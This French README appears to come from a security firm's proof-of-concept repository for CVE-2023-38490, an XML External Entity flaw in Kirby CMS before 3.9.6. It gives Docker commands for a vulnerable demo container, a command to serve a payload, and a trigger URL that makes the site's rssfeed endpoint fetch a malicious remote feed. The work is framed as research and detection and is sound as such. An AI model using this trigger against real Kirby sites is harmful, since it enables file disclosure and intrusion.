
Kirby < 3.9.6 XML External Entity exploit
Kirby < 3.9.6 Entité Externe XML
Exploit pour CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Construire et exécuter l'application de démonstration vulnérable :
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Servir la charge utile de démonstration :
Remarque : choisissez une adresse de liaison que le conteneur docker peut atteindre.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Déclencher l'exploit :
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
La fonction vulnérable est présente dans Kirby Core mais n'est pas utilisée par défaut dans Kirby Core, Kirby StarterKit ou Kirby PlainKit. Cela signifie que la vulnérabilité ne vous affectera pas sur la configuration par défaut mais pourrait être introduite avec un développement personnalisé ou en installant un plugin utilisant la boîte à outils impactée.
ACCEIS ne promeut ni n'encourage aucune activité illégale, tout le contenu fourni par ce dépôt est destiné uniquement à des fins de recherche, d'éducation et de détection de menaces.